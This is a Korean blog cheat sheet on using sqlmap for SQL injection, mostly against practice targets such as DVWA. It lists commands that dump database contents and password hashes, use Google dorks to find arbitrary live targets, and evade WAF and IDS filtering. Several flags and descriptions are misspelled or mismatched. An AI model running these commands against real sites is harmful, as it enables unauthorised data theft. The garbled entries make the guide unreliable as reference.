이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다.
SQLMAP 사용법 정리 
기본정보 확인 
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -v 5 
sqlmap.py -u "http://webhacking.kr/challenge/web/web-02/admin/index.php" -v 5 
데이터베이스 이름 가져오는 명령 
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -v 5 --dbms="MySQL" --os="Windows" --dbs 
데이터베이스 테이블 확인 
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa --tables 
데이터베이스 테이블의 컬럼 확인 
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa -T users --columns 
Dump 명령어를 통한 정보 출력 
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa -T users -C passowrd --dump 
Google dork 결과를 대상 주소로 처리하기 
sqlmap.py -g "inurl:\".php?id=1\"" -> 파라미터가 id=1 인값을 자동으로 찾는다 
sqlmap.py -u "http://domain_IP/xvwa/vulnerabilities/sqli_blind/" --data="item=1&search=" --dbs 
옵션 정보 확인 
--data 
HTTP 메소드중 Get 메소드가 아닌 POST 요청으로 전송할때 사용 
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/" --data="id=1" --dbs 
sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" --dbs 
HTTP User-Agent 헤더 변경 
--banner 
시스템 버전과 패치 정보 확인 
--current-user 
DB 관리 시스템의 사용자 정보 검색 
--current-db 
현재 연결된 DB 이름을 확인 
--hostname 
서버 호스트 이름을 검색 
--users 
사용자 목록을 출력 
--passwords 
암호 해시를 나열 
--schema --batch --exclude-sysdbs 
모든 데이터베이스의 테이블 을 출력 
--count -D -T -C 
항목수를 표시하기 위해 사용 
-hpp 
WAF/IPS/IDS 를 우회 
--identify-waf 
보안장비 사용자 인증 
--mobile 
User-Agent 헤더를 모바일로 사용 
--offline 
이전 세션 데이터 값을 사용 연결시도는 0이 됨 
--sqlmap-shell 
사용자 전환 
sqlmap --cookie="" --random-agent --level=1 --rist=1 -u [URL] --sql-query="select passhash from users"
'Code::Security > ETC' 카테고리의 다른 글
| 2021 OWASP TOP10 (0) | 2022.09.05 | 
|---|---|
| 윈도우 명령 프롬프트(CMD) 및 명령어 알아보기 (0) | 2022.08.10 | 
| 공개 도구를 이용한 홈페이지 취약점 점검 안내서 (0) | 2021.06.17 | 
| XSS 기본 태그 사용법 정리 (0) | 2021.06.17 | 
| OfficeMalScanner.exe를 이용한 MS Office 매크로 코드 추출법 (0) | 2018.09.19 |